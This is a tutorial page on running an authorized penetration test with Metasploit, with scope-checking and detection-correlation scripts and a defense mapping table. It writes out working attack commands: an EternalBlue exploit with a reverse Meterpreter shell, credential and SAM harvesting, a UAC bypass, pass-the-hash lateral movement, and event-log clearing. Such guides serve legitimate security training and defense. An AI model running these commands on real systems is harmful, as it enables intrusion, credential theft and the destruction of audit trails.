Last updated: March 22, 2026

How to Use Metasploit for Authorized Pentesting

Metasploit Framework is the standard toolkit for offensive security professionals. This guide covers conducting a structured penetration test on systems you have explicit written authorization to test. Every command here should only be run against infrastructure you own or have a signed Rules of Engagement document for.

Legal and ethical boundary: Unauthorized use of Metasploit constitutes unauthorized computer access, a felony in the US (CFAA), UK (Computer Misuse Act), EU, and nearly every other jurisdiction. Get written authorization before touching anything.


1. Install Metasploit Framework

# Kali Linux: pre-installed
msfconsole --version

# Ubuntu (official installer)
curl -s https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | sudo tee /usr/local/bin/msfinstall
sudo chmod 755 /usr/local/bin/msfinstall
sudo msfinstall

# Initialize the database (PostgreSQL)
sudo msfdb init
msfconsole

2. Engagement Workflow

A structured pentest follows these phases:

Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting

Always document every action with timestamps. Use Metasploit’s workspaces to separate engagements.


3. Workspace Setup

msf6> workspace -a client_pentest_2026_03
msf6> workspace client_pentest_2026_03
msf6> workspace
  * client_pentest_2026_03
    default

Workspaces separate hosts, services, and loot by engagement.


4. Reconnaissance: Port Scanning

msf6> db_nmap -sV -sC -O -p 1-65535 192.168.100.0/24

# View discovered hosts
msf6> hosts

# View discovered services
msf6> services

# Filter by port
msf6> services -p 445

# Export for reporting
msf6> hosts -o /tmp/hosts.csv
msf6> services -o /tmp/services.csv

db_nmap runs nmap and automatically imports results into the database.
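As an added example (not part of the original guide), a small Python script that reads the two CSV exports above, checks every discovered host against the Rules of Engagement scope, and builds the RHOSTS list for the read-only SMB check that follows. The CSV column layout is assumed to match Metasploit's `hosts -o` / `services -o` output, and the sample rows are constructed.

```python
"""Added example (not part of the original guide): validate Metasploit's
hosts/services CSV exports against the RoE scope before the SMB check."""
import csv, io, ipaddress

# Constructed sample in the column layout assumed for `hosts -o`.
HOSTS_CSV = """address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
192.168.100.15,,FILESRV01,Windows 7,,,server,,
192.168.100.16,,WKS-22,Windows 10,,,client,,
192.168.101.40,,PRINTER,Embedded,,,device,,
"""

# Constructed sample in the column layout assumed for `services -o`.
SERVICES_CSV = """host,port,proto,name,state,info
192.168.100.15,445,tcp,smb,open,Windows 7 Ultimate 7601 Service Pack 1
192.168.100.15,3389,tcp,ms-wbt-server,open,
192.168.100.16,445,tcp,smb,open,Windows 10 Pro
192.168.101.40,9100,tcp,jetdirect,open,
"""

def load_rows(text):
    return list(csv.DictReader(io.StringIO(text)))

def scope_check(host_rows, scope_cidrs):
    """Split discovered hosts into in-scope / out-of-scope by the RoE CIDRs."""
    nets = [ipaddress.ip_network(c) for c in scope_cidrs]
    in_scope, out_scope = [], []
    for row in host_rows:
        addr = ipaddress.ip_address(row["address"])
        (in_scope if any(addr in n for n in nets) else out_scope).append(row["address"])
    return sorted(in_scope), sorted(out_scope)

def smb_targets(service_rows, in_scope):
    """In-scope hosts with TCP/445 open: the RHOSTS list for smb_ms17_010."""
    return sorted({r["host"] for r in service_rows
                   if r["port"] == "445" and r["proto"] == "tcp"
                   and r["state"] == "open" and r["host"] in in_scope})

def write_rhosts(path, hosts):
    """One host per line, the format `set RHOSTS file:<path>` reads."""
    with open(path, "w") as fh:
        fh.write("\n".join(hosts) + "\n")

if __name__ == "__main__":
    ok, bad = scope_check(load_rows(HOSTS_CSV), ["192.168.100.0/24"])
    print("in scope:", ok)
    print("OUT OF SCOPE, do not touch, raise with the client:", bad)
    print("RHOSTS for smb_ms17_010:", smb_targets(load_rows(SERVICES_CSV), ok))
```

Anything that lands in the out-of-scope list is a finding for the client (an unexpected host on the tested range), not a target.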


5. Search for Relevant Exploits

# Search by CVE
msf6> search cve:2021-34527     # PrintNightmare
msf6> search cve:2017-0144      # EternalBlue (MS17-010)

# Search by platform and type
msf6> search platform:windows type:exploit name:smb

# Search by service
msf6> search type:auxiliary name:ssh

# Check exploit rank/reliability
msf6> info exploit/windows/smb/ms17_010_eternalblue

Exploit rankings: Excellent > Great > Good > Normal > Average > Low. Prefer Excellent or Great for production tests to minimize the risk of destabilizing the target.


6. Example: SMB Vulnerability Check (No Exploitation)

Before exploiting, confirm vulnerability exists:

msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.100.0/24
msf6> set THREADS 10
msf6> run

Output:
[+] 192.168.100.15:445 - Host is likely VULNERABLE to MS17-010!
[-] 192.168.100.16:445 - Host does NOT appear to be vulnerable.

7. Example: Exploitation with Meterpreter

After written confirmation to proceed beyond discovery:

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.100.15
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.100.1     # your attacker IP
msf6> set LPORT 4444
msf6> set VERBOSE true

# Preview what will happen before running
msf6> info

# Execute
msf6> run

If successful:

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

8. Post-Exploitation: Evidence Gathering

Collect evidence for the report (screenshots, hash dumps, configuration files):

meterpreter > screenshot                    # capture screen
meterpreter > ps                            # running processes
meterpreter > netstat                       # network connections
meterpreter > run post/multi/recon/local_exploit_suggester   # privilege escalation suggestions

# Gather credentials
meterpreter > run post/windows/gather/credentials/credential_collector

# Check for installed AV
meterpreter > run post/windows/gather/enum_av

# File search
meterpreter > search -f *.config -d C:\\
meterpreter > search -f *password* -d C:\\Users\\

# Download an evidence file
meterpreter > download C:\\Windows\\System32\\config\\SAM /tmp/evidence/

9. Privilege Escalation

meterpreter > getsystem     # automated local privilege escalation attempt

# If getsystem fails:
meterpreter > background
msf6> use post/multi/recon/local_exploit_suggester
msf6> set SESSION 1
msf6> run

# Try a suggested exploit
msf6> use exploit/windows/local/bypassuac_eventvwr
msf6> set SESSION 1
msf6> run

10. Lateral Movement (Authorized Scope Only)

Only attempt lateral movement to hosts explicitly included in the Rules of Engagement:

meterpreter > run post/windows/gather/credentials/hashdump

# Use the captured hash for pass-the-hash against other hosts in scope
msf6> use exploit/windows/smb/psexec
msf6> set RHOSTS 192.168.100.20
msf6> set SMBUser Administrator
msf6> set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> run

11. Cleanup (Critical)

Leave systems exactly as you found them:

meterpreter > clearev       # clear Windows event logs
                            # Note: clearing logs is visible to a SIEM; discuss with the client first

# Remove any files you dropped
meterpreter > rm C:\\Windows\\Temp\\payload.exe

# Terminate sessions cleanly
meterpreter > exit

# Kill all remaining sessions
msf6> sessions -K

# Back up your workspace data before clearing it
msf6> db_export -f xml /tmp/client_pentest_2026.xml

12. Generate a Report

# Export all findings to XML
msfconsole -q -x "workspace client_pentest_2026_03; \
  db_export -f xml /tmp/pentest_data.xml; exit"

# Use Dradis (open-source pentest reporting tool) to build the report
sudo gem install dradis

Recommended report structure:
1. Executive Summary
2. Scope and Methodology
3. Critical Findings (with CVSS scores, evidence screenshots)
4. High / Medium / Low Findings
5. Remediation Roadmap
6. Testing Timeline (every command, every timestamp)

Automation: Resource Scripts

Metasploit resource scripts automate repeated tasks:

# /tmp/smb_scan.rc
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS file:/tmp/targets.txt
set THREADS 20
run
exit

# Run it non-interactively
msfconsole -r /tmp/smb_scan.rc

Defense Correlation

Every action in this guide should be detectable. Use this to validate your defenses:

Offensive Action             Expected Detection
---------------------------  --------------------------------------
db_nmap port scan            IDS alert, firewall log
EternalBlue exploit attempt  Snort/Suricata SMB rule
Meterpreter reverse shell    EDR process injection alert
hashdump                     Wazuh Windows event 4624 + 4688
clearev                      Wazuh event 1102 (audit log cleared)
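As an added example (not from the original guide), a small Python correlation pass over constructed Windows Security events for the last two rows of the table: it flags event 1102 (the footprint of clearev) and a type-3 network logon (4624) followed within a few minutes by a process creation (4688) for the same account on the same host (the footprint the table gives for hashdump). The event field names and the matching keys are simplifications assumed for this example, not a Wazuh rule.

```python
"""Added example, not from the original guide: minimal correlation over
Windows Security events as a SIEM such as Wazuh would collect them.
Event shape and sample records are constructed for the example."""
from datetime import datetime, timedelta

# Constructed sample: fields mirror the Windows Security log, times are UTC.
EVENTS = [
    {"host": "FILESRV01", "time": "2026-03-22T10:14:02", "id": 4624,
     "logon_type": 3, "user": "Administrator", "src_ip": "192.168.100.1"},
    {"host": "FILESRV01", "time": "2026-03-22T10:14:05", "id": 4688,
     "user": "Administrator", "process": "C:\\Windows\\Temp\\payload.exe"},
    {"host": "WKS-22", "time": "2026-03-22T10:20:00", "id": 4624,
     "logon_type": 2, "user": "jsmith", "src_ip": "-"},     # interactive, benign
    {"host": "WKS-22", "time": "2026-03-22T10:20:30", "id": 4688,
     "user": "jsmith", "process": "C:\\Windows\\explorer.exe"},
    {"host": "FILESRV01", "time": "2026-03-22T10:31:40", "id": 1102,
     "user": "Administrator"},
]

def ts(event):
    return datetime.fromisoformat(event["time"])

def correlate(events, window=timedelta(minutes=5)):
    """Return (rule, host, detail) alerts for:
    - a network logon (4624, logon type 3) followed within `window` by a
      process creation (4688) for the same account on the same host;
    - any 1102 (audit log cleared)."""
    alerts = []
    net_logons = [e for e in events if e["id"] == 4624 and e.get("logon_type") == 3]
    for e in sorted(events, key=ts):
        if e["id"] == 1102:
            alerts.append(("audit_log_cleared", e["host"], e["user"]))
        elif e["id"] == 4688:
            for lg in net_logons:
                if (lg["host"] == e["host"] and lg["user"] == e["user"]
                        and timedelta(0) <= ts(e) - ts(lg) <= window):
                    alerts.append(("net_logon_then_process", e["host"],
                                   f'{lg["src_ip"]} -> {e["process"]}'))
                    break
    return alerts

if __name__ == "__main__":
    for rule, host, detail in correlate(EVENTS):
        print(f"[ALERT] {rule} on {host}: {detail}")
```

Run against the events your SIEM actually recorded during the engagement: a row of the table with no matching alert is a detection gap to put in the report.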

Built by theluckystrike. More at zovo.one